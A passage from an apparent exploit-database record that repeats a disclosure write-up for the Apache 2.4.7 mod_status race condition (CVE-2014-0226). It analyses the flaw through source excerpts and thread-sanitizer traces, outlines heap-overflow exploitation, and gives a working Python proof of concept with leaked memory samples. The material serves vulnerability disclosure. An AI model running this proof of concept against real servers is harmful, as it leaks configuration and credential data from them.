until it hits an unmapped memory or read only\r\narea.\r\n \r\nPart of the scoreboard.c code which may overwrite the\r\nws_record->request was discovered using a tsan:\r\n \r\n #1 ap_escape_logitem ??:0 (exe+0x0000000411f2)\r\n #2 status_handler\r\n/home/akat-1/src/httpd-2.4.7/modules/generators/mod_status.c:839\r\n(mod_status.so+0x0000000044b0)\r\n #3 ap_run_handler ??:0 (exe+0x000000084d98)\r\n #4 ap_invoke_handler ??:0 (exe+0x00000008606e)\r\n #5 ap_process_async_request ??:0 (exe+0x0000000b7ed9)\r\n #6 ap_process_http_async_connection http_core.c:0\r\n(exe+0x0000000b143e)\r\n #7 ap_process_http_connection http_core.c:0 (exe+0x0000000b177f)\r\n #8 ap_run_process_connection ??:0 (exe+0x00000009d156)\r\n #9 process_socket event.c:0 (exe+0x0000000cc65e)\r\n #10 worker_thread event.c:0 (exe+0x0000000d0945)\r\n #11 dummy_worker thread.c:0 (libapr-1.so.0+0x00000004bb57)\r\n #12 :0 (libtsan.so.0+0x00000001b279)\r\n \r\n Previous write of size 1 at 0x7feff2b862b8 by thread T2:\r\n #0 update_child_status_internal scoreboard.c:0\r\n(exe+0x00000004d4c6)\r\n #1 ap_update_child_status_from_conn ??:0 (exe+0x00000004d693)\r\n #2 ap_process_http_async_connection http_core.c:0\r\n(exe+0x0000000b139a)\r\n #3 ap_process_http_connection http_core.c:0 (exe+0x0000000b177f)\r\n #4 ap_run_process_connection ??:0 (exe+0x00000009d156)\r\n #5 process_socket event.c:0 (exe+0x0000000cc65e)\r\n #6 worker_thread event.c:0 (exe+0x0000000d0945)\r\n #7 dummy_worker thread.c:0 (libapr-1.so.0+0x00000004bb57)\r\n #8 :0 (libtsan.so.0+0x00000001b279)\r\n--[ 3. Consequences\r\n \r\nRace condition described in section 2, may lead to:\r\n \r\n - information leak in case when the string returned by\r\nap_escape_logitem is not at the end,\r\n junk after copied bytes may be valuable\r\n - overwriting heap with a user supplied value which may imply code\r\nexecution\r\n--[ 4. 
Exploitation\r\n \r\n In order to exploit the heap overflow bug it's necessary to get\r\ncontrol over:\r\n \r\n 1) triggering the race-condition bug\r\n 2) allocating 's' and 'd' strings in the ap_escape_html2 to overlap\r\n 3) part of 's' which doesn't overlap with 'd' (this string is copied\r\nover and over again)\r\n 4) overwriting the heap in order to get total control over the cpu or\r\nat least modify the\r\n apache's handler code flow for our benefits\r\n--[ 5. Information Disclosure Proof of Concept\r\n \r\n -- cut\r\n #! /usr/bin/env python\r\n \r\n import httplib\r\n import sys\r\n import threading\r\n import subprocess\r\n import random\r\n \r\n def send_request(method, url):\r\n try:\r\n c = httplib.HTTPConnection('127.0.0.1', 80)\r\n c.request(method,url);\r\n if \"foo\" in url:\r\n print c.getresponse().read()\r\n c.close()\r\n except Exception, e:\r\n print e\r\n pass\r\n \r\n def mod_status_thread():\r\n while True:\r\n send_request(\"GET\", \"/foo?notables\")\r\n \r\n def requests():\r\n evil = ''.join('A' for i in range(random.randint(0, 1024)))\r\n while True:\r\n send_request(evil, evil)\r\n \r\n threading.Thread(target=mod_status_thread).start()\r\n threading.Thread(target=requests).start()\r\n \r\n -- cut\r\n \r\nBelow are the information leak samples gathered by running the poc\r\nagainst the\r\ntesting Apache instance. Leaks include i.e. HTTP headers, htaccess\r\ncontent,\r\nhttpd.conf content etc. 
On a live systems with a higher traffic\r\nsamples should\r\nbe way more interesting.\r\n \r\n $ ./poc.py | grep \"\" |grep -v AAAA | grep -v \"{}\"| grep -v notables\r\n 127.0.0.1 {A} []\r\n 127.0.0.1 {A.01 cu0 cs0\r\n 127.0.0.1 {A27.0.0.1} []\r\n 127.0.0.1 {A|0|10 [Dead] u.01 s.01 cu0 cs0\r\n 127.0.0.1 {A\r\n \u00db []\r\n 127.0.0.1 {A HTTP/1.1} []\r\n 127.0.0.1 {Ab><br />\r\n 127.0.0.1 {AAA}</i> <b>[127.0.1.1:19666]</b><br\r\n/>\r\n 127.0.0.1 {A0.1.1:19666]</b><br />\r\n 127.0.0.1 {A\u00a7} []\r\n 127.0.0.1 {A cs0\r\n 127.0.0.1 {Adentity\r\n 127.0.0.1 {A HTTP/1.1} []\r\n 127.0.0.1 {Ape: text/html; charset=ISO-8859-1\r\n 127.0.0.1 {Ahome/IjonTichy/httpd-2.4.7-vanilla/htdocs/} []\r\n 127.0.0.1 {A\u00ff\u00ff\u00ff\u00ff\u00ff\u00ff\u00ff} []\r\n 127.0.0.1 {Aanilla/htdocs/foo} []\r\n 127.0.0.1 {A0n/httpd-2.4.7-vanilla/htdocs/foo/} []\r\n 127.0.0.1 {A......................................... } []\r\n 127.0.0.1 {A-2014 16:23:30 CEST} []\r\n 127.0.0.1 {Acontent of htaccess\r\n 127.0.0.1 {Aver: Apache/2.4.7 (Unix)\r\n 127.0.0.1 {Aroxy:balancer://mycluster} []\r\nWe hope you enjoyed it.\r\n \r\nRegards,\r\nMarek Kroemeke, AKAT-1 and 22733db72ab3ed94b5f8a1ffcde850251fe6f466\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22451"}], "exploitdb": [{"lastseen": "2016-02-03T20:33:50", "description": "Apache 2.4.7 mod_status Scoreboard Handling Race Condition. CVE-2014-0226. Dos exploit for linux platform", "published": "2014-07-21T00:00:00", "type": "exploitdb", "title": "Apache 2.4.7 mod_status Scoreboard Handling Race Condition", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0226"], "modified": "2014-07-21T00:00:00", "id": "EDB-ID:34133", "href": "https://www.exploit-db.com/exploits/34133/", "sourceData": "--[ 0. 
Sparse summary\r\nRace condition between updating httpd's \"scoreboard\" and mod_status,\r\nleading to several critical scenarios like heap buffer overflow with\r\nuser\r\nsupplied payload and leaking heap which can leak critical memory\r\ncontaining\r\nhtaccess credentials, ssl certificates private keys and so on.\r\n--[ 1. Prerequisites\r\n\r\nApache httpd compiled with MPM event or MPM worker.\r\nThe tested version was 2.4.7 compiled with:\r\n\r\n ./configure --enable-mods-shared=reallyall --with-included-apr\r\n\r\nThe tested mod_status configuration in httpd.conf was:\r\n SetHandler server-status\r\n ExtendedStatus On\r\n--[ 2. Race Condition\r\n\r\nFunction ap_escape_logitem in server/util.c looks as follows:\r\n\r\n 1908AP_DECLARE(char *) ap_escape_logitem(apr_pool_t *p, const char\r\n*str)\r\n 1909{\r\n 1910 char *ret;\r\n 1911 unsigned char *d;\r\n 1912 const unsigned char *s;\r\n 1913 apr_size_t length, escapes = 0;\r\n 1914\r\n 1915 if (!str) {\r\n 1916 return NULL;\r\n 1917 }\r\n 1918\r\n 1919 /* Compute how many characters need to be escaped */\r\n 1920 s = (const unsigned char *)str;\r\n 1921 for (; *s; ++s) {\r\n 1922 if (TEST_CHAR(*s, T_ESCAPE_LOGITEM)) {\r\n 1923 escapes++;\r\n 1924 }\r\n 1925 }\r\n 1926\r\n 1927 /* Compute the length of the input string, including NULL\r\n*/\r\n 1928 length = s - (const unsigned char *)str + 1;\r\n 1929\r\n 1930 /* Fast path: nothing to escape */\r\n 1931 if (escapes == 0) {\r\n 1932 return apr_pmemdup(p, str, length);\r\n 1933 }\r\n\r\nIn the for-loop between 1921 and 1925 lines function is computing the\r\nlength of\r\nsupplied str (almost like strlen, but additionally it counts special\r\ncharacters\r\nwhich need to be escaped). As comment in 1927 value says, function\r\ncomputes count\r\nof bytes to copy. If there's nothing to escape function uses\r\napr_pmemdup to duplicate\r\nthe str. In our single-threaded mind everything looks good, but tricky\r\npart starts\r\nwhen we introduce multi-threading. 
Apache in MPM mode runs workers as\r\nthreads, let's\r\nconsider the following scenario:\r\n\r\n 1) ap_escape_logitem(pool, \"\") is called\r\n 2) for-loop in 1921 line immediately escapes, because *s is in\r\nfirst loop run\r\n 3) malicious thread change memory under *s to another value\r\n(something which is not )\r\n 4) apr_pmemdup copies that change value to new string and returns\r\nit\r\n\r\nOutput from the ap_escape_logitem is considered to be a string, if\r\nscenario above would occur,\r\nthen returned string would not be zeroed at the end, which may be\r\nharmful. The mod_status\r\ncode looks as follows:\r\n\r\n 833 ap_rprintf(r, \"%s%s\"\r\n 834 \"%snn\",\r\n 835 ap_escape_html(r->pool,\r\n 836 \r\nws_record->client),\r\n 837 ap_escape_html(r->pool,\r\n 838 \r\nws_record->vhost),\r\n 839 ap_escape_html(r->pool,\r\n 840 \r\nap_escape_logitem(r->pool,\r\n 841 \r\nws_record->request)));\r\n\r\nThe relevant call to ap_escape_html() is at line 839 after the\r\nevaluation of ap_escape_logitem().\r\nThe first argument passed to the ap_escape_logitem() is in fact an apr\r\npool associated with\r\nthe HTTP request and defined in the request_rec structure.\r\n\r\nThis code is a part of a larger for-loop where code is iterating over\r\nworker_score structs which is\r\ndefined as follows:\r\n\r\n 90struct worker_score {\r\n 91#if APR_HAS_THREADS\r\n 92 apr_os_thread_t tid;\r\n 93#endif\r\n 94 int thread_num;\r\n 95 /* With some MPMs (e.g., worker), a worker_score can\r\nrepresent\r\n 96 * a thread in a terminating process which is no longer\r\n 97 * represented by the corresponding process_score. 
These\r\nMPMs\r\n 98 * should set pid and generation fields in the worker_score.\r\n 99 */\r\n 100 pid_t pid;\r\n 101 ap_generation_t generation;\r\n 102 unsigned char status;\r\n 103 unsigned short conn_count;\r\n 104 apr_off_t conn_bytes;\r\n 105 unsigned long access_count;\r\n 106 apr_off_t bytes_served;\r\n 107 unsigned long my_access_count;\r\n 108 apr_off_t my_bytes_served;\r\n 109 apr_time_t start_time;\r\n 110 apr_time_t stop_time;\r\n 111 apr_time_t last_used;\r\n 112#ifdef HAVE_TIMES\r\n 113 struct tms times;\r\n 114#endif\r\n 115 char client[40]; /* Keep 'em small... but large\r\nenough to hold an IPv6 address */\r\n 116 char request[64]; /* We just want an idea... */\r\n 117 char vhost[32]; /* What virtual host is being\r\naccessed? */\r\n 118};\r\n\r\nThe 'request' field in a worker_score structure is particularly\r\ninteresting - this field can be changed inside\r\nthe copy_request function, which is called by the\r\nupdate_child_status_internal. This change may occur when the\r\nmod_status is iterating over the workers at the same time the\r\nap_escape_logitem is called within a different\r\nthread, leading to a race condition. We can trigger this exact\r\nscenario in order to return a string without a\r\ntrailing . This can be achived by running two clients, one triggering\r\nthe mod_status handler and second\r\nsending random requests to the web server. 
Let's consider the\r\nfollowing example:\r\n\r\n 1) the mod_status iterates over workers invoking\r\nupdate_child_status_internal()\r\n 2) at some point for one worker mod_status calls\r\nap_escape_logitem(pool, ws_record->request)\r\n 3) let's asume that ws_record->request at the beginning is \"\"\r\nliterally at the first byte.\r\n 4) inside the ap_escape_logitem function the length of the\r\nws_record->request is computed, which is 1\r\n (an empty string consisting of )\r\n 5) another thread modifies ws_record->request (in fact it's called\r\nws->request in update_child_status_internal\r\n function but it's exactly the same location in memory) and puts\r\nthere i.e. \"GET / HTTP/1.0\"\r\n 6) the ap_pmemdup(pool, str, 1) in ap_escape_logitem copies the\r\nfirst one byte from \"GET / HTTP/1.0\" - \"G\" in\r\n that case and returns it. The ap_pmemdup looks as follows:\r\n\r\n 112APR_DECLARE(void *) apr_pmemdup(apr_pool_t *a, const void\r\n*m, apr_size_t n)\r\n 113{\r\n 114 void *res;\r\n 115\r\n 116 if (m == NULL)\r\n 117 return NULL;\r\n 118 res = apr_palloc(a, n);\r\n 119 memcpy(res, m, n);\r\n 120 return res;\r\n\r\n It allocates memory using apr_palloc function which returns\r\n\"ditry\" memory (note that apr_pcalloc overwrite\r\n allocated memory with NULs).\r\n\r\n So it's non-deterministic what's after the copied \"G\" byte.\r\nThere might be or might be not. For now let's\r\n assume that the memory allocated by apr_palloc was dirty\r\n(containing random bytes).\r\n 7) ap_escape_logitem returns \"G.....\" .junk. 
\"\"\r\n\r\nThe value from the example above is then pushed to the ap_escape_html2\r\nfunction which is also declared in util.c:\r\n\r\n 1860AP_DECLARE(char *) ap_escape_html2(apr_pool_t *p, const char\r\n*s, int toasc)\r\n 1861{\r\n 1862 int i, j;\r\n 1863 char *x;\r\n 1864\r\n 1865 /* first, count the number of extra characters */\r\n 1866 for (i = 0, j = 0; s[i] != ''; i++)\r\n 1867 if (s[i] == '')\r\n 1868 j += 3;\r\n 1869 else if (s[i] == '&')\r\n 1870 j += 4;\r\n 1871 else if (s[i] == '\"')\r\n 1872 j += 5;\r\n 1873 else if (toasc && !apr_isascii(s[i]))\r\n 1874 j += 5;\r\n 1875\r\n 1876 if (j == 0)\r\n 1877 return apr_pstrmemdup(p, s, i);\r\n 1878\r\n 1879 x = apr_palloc(p, i + j + 1);\r\n 1880 for (i = 0, j = 0; s[i] != ''; i++, j++)\r\n 1881 if (s[i] == '') {\r\n 1886 memcpy(&x[j], \">\", 4);\r\n 1887 j += 3;\r\n 1888 }\r\n 1889 else if (s[i] == '&') {\r\n 1890 memcpy(&x[j], \"&\", 5);\r\n 1891 j += 4;\r\n 1892 }\r\n 1893 else if (s[i] == '\"') {\r\n 1894 memcpy(&x[j], \"\"\", 6);\r\n 1895 j += 5;\r\n 1896 }\r\n 1897 else if (toasc && !apr_isascii(s[i])) {\r\n 1898 char *esc = apr_psprintf(p, \"&#%3.3d;\", (unsigned\r\nchar)s[i]);\r\n 1899 memcpy(&x[j], esc, 6);\r\n 1900 j += 5;\r\n 1901 }\r\n 1902 else\r\n 1903 x[j] = s[i];\r\n 1904\r\n 1905 x[j] = '';\r\n 1906 return x;\r\n 1907}\r\n\r\nIf the string from the example above would be passed to this function\r\nwe should get the following code-flow:\r\n\r\n 1) in the for-loop started in line 1866 we count the length of\r\nescaped string\r\n 2) because 's' string contains junk (due to only one byte being\r\nallocated by the apr_palloc function),\r\n it may contain '>' character. 
Let's assume that this is our\r\ncase\r\n 3) after for-loop in 1866 line 'j' is greater than 0 (at least one\r\ns[i] equals '>' as assumed above\r\n 4) in the 1879 line memory for escaped 'd' string is allocated\r\n 5) for-loop started in line 1880 copies string 's' to the escaped\r\n'd' string BUT apr_palloc has allocated\r\n only one byte for 's'. Thus, for each i > 0 the loop reads\r\nrandom memory and copies that value\r\n to 'd' string. At this point it's possible to trigger an\r\ninformation leak vulnerability (see section 5).\r\n\r\nHowever the 's' string may overlap with 'd' i.e.:\r\n\r\n 's' is allocated under 0 with contents s = \"AAAAAAAA>\"\r\n 'd' is allocated under 8 then s[8] = d[0].\r\n\r\nIf that would be the case, then for-loop would run forever (s[i] never\r\nwould be since it was overwritten in the loop\r\nby non-zero). Forever... until it hits an unmapped memory or read only\r\narea.\r\n\r\nPart of the scoreboard.c code which may overwrite the\r\nws_record->request was discovered using a tsan:\r\n\r\n #1 ap_escape_logitem ??:0 (exe+0x0000000411f2)\r\n #2 status_handler\r\n/home/akat-1/src/httpd-2.4.7/modules/generators/mod_status.c:839\r\n(mod_status.so+0x0000000044b0)\r\n #3 ap_run_handler ??:0 (exe+0x000000084d98)\r\n #4 ap_invoke_handler ??:0 (exe+0x00000008606e)\r\n #5 ap_process_async_request ??:0 (exe+0x0000000b7ed9)\r\n #6 ap_process_http_async_connection http_core.c:0\r\n(exe+0x0000000b143e)\r\n #7 ap_process_http_connection http_core.c:0 (exe+0x0000000b177f)\r\n #8 ap_run_process_connection ??:0 (exe+0x00000009d156)\r\n #9 process_socket event.c:0 (exe+0x0000000cc65e)\r\n #10 worker_thread event.c:0 (exe+0x0000000d0945)\r\n #11 dummy_worker thread.c:0 (libapr-1.so.0+0x00000004bb57)\r\n #12 :0 (libtsan.so.0+0x00000001b279)\r\n\r\n Previous write of size 1 at 0x7feff2b862b8 by thread T2:\r\n #0 update_child_status_internal scoreboard.c:0\r\n(exe+0x00000004d4c6)\r\n #1 ap_update_child_status_from_conn ??:0 (exe+0x00000004d693)\r\n #2 
ap_process_http_async_connection http_core.c:0\r\n(exe+0x0000000b139a)\r\n #3 ap_process_http_connection http_core.c:0 (exe+0x0000000b177f)\r\n #4 ap_run_process_connection ??:0 (exe+0x00000009d156)\r\n #5 process_socket event.c:0 (exe+0x0000000cc65e)\r\n #6 worker_thread event.c:0 (exe+0x0000000d0945)\r\n #7 dummy_worker thread.c:0 (libapr-1.so.0+0x00000004bb57)\r\n #8 :0 (libtsan.so.0+0x00000001b279)\r\n--[ 3. Consequences\r\n\r\nRace condition described in section 2, may lead to:\r\n\r\n - information leak in case when the string returned by\r\nap_escape_logitem is not at the end,\r\n junk after copied bytes may be valuable\r\n - overwriting heap with a user supplied value which may imply code\r\nexecution\r\n--[ 4. Exploitation\r\n\r\n In order to exploit the heap overflow bug it's necessary to get\r\ncontrol over:\r\n\r\n 1) triggering the race-condition bug\r\n 2) allocating 's' and 'd' strings in the ap_escape_html2 to overlap\r\n 3) part of 's' which doesn't overlap with 'd' (this string is copied\r\nover and over again)\r\n 4) overwriting the heap in order to get total control over the cpu or\r\nat least modify the\r\n apache's handler code flow for our benefits\r\n--[ 5. Information Disclosure Proof of Concept\r\n\r\n -- cut\r\n #! 
/usr/bin/env python\r\n\r\n import httplib\r\n import sys\r\n import threading\r\n import subprocess\r\n import random\r\n\r\n def send_request(method, url):\r\n try:\r\n c = httplib.HTTPConnection('127.0.0.1', 80)\r\n c.request(method,url);\r\n if \"foo\" in url:\r\n print c.getresponse().read()\r\n c.close()\r\n except Exception, e:\r\n print e\r\n pass\r\n\r\n def mod_status_thread():\r\n while True:\r\n send_request(\"GET\", \"/foo?notables\")\r\n\r\n def requests():\r\n evil = ''.join('A' for i in range(random.randint(0, 1024)))\r\n while True:\r\n send_request(evil, evil)\r\n\r\n threading.Thread(target=mod_status_thread).start()\r\n threading.Thread(target=requests).start()\r\n\r\n -- cut\r\n\r\nBelow are the information leak samples gathered by running the poc\r\nagainst the\r\ntesting Apache instance. Leaks include i.e. HTTP headers, htaccess\r\ncontent,\r\nhttpd.conf content etc. On a live systems with a higher traffic\r\nsamples should\r\nbe way more interesting.\r\n\r\n $ ./poc.py | grep \"\" |grep -v AAAA | grep -v \"{}\"| grep -v notables\r\n 127.0.0.1 {A} []\r\n 127.0.0.1 {A.01 cu0 cs0\r\n 127.0.0.1 {A27.0.0.1} []\r\n 127.0.0.1 {A|0|10 [Dead] u.01 s.01 cu0 cs0\r\n 127.0.0.1 {A\r\n \u00db []\r\n 127.0.0.1 {A HTTP/1.1} []\r\n 127.0.0.1 {Ab><br />\r\n 127.0.0.1 {AAA}</i> <b>[127.0.1.1:19666]</b><br\r\n/>\r\n 127.0.0.1 {A0.1.1:19666]</b><br />\r\n 127.0.0.1 {A\u00a7} []\r\n 127.0.0.1 {A cs0\r\n 127.0.0.1 {Adentity\r\n 127.0.0.1 {A HTTP/1.1} []\r\n 127.0.0.1 {Ape: text/html; charset=ISO-8859-1\r\n 127.0.0.1 {Ahome/IjonTichy/httpd-2.4.7-vanilla/htdocs/} []\r\n 127.0.0.1 {A\u00ff\u00ff\u00ff\u00ff\u00ff\u00ff\u00ff} []\r\n 127.0.0.1 {Aanilla/htdocs/foo} []\r\n 127.0.0.1 {A0n/httpd-2.4.7-vanilla/htdocs/foo/} []\r\n 127.0.0.1 {A......................................... 
} []\r\n 127.0.0.1 {A-2014 16:23:30 CEST} []\r\n 127.0.0.1 {Acontent of htaccess\r\n 127.0.0.1 {Aver: Apache/2.4.7 (Unix)\r\n 127.0.0.1 {Aroxy:balancer://mycluster} []\r\nWe hope you enjoyed it.\r\n\r\nRegards,\r\nMarek Kroemeke, AKAT-1 and 22733db72ab3ed94b5f8a1ffcde850251fe6f466\r\n\r\n\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/34133/"}]}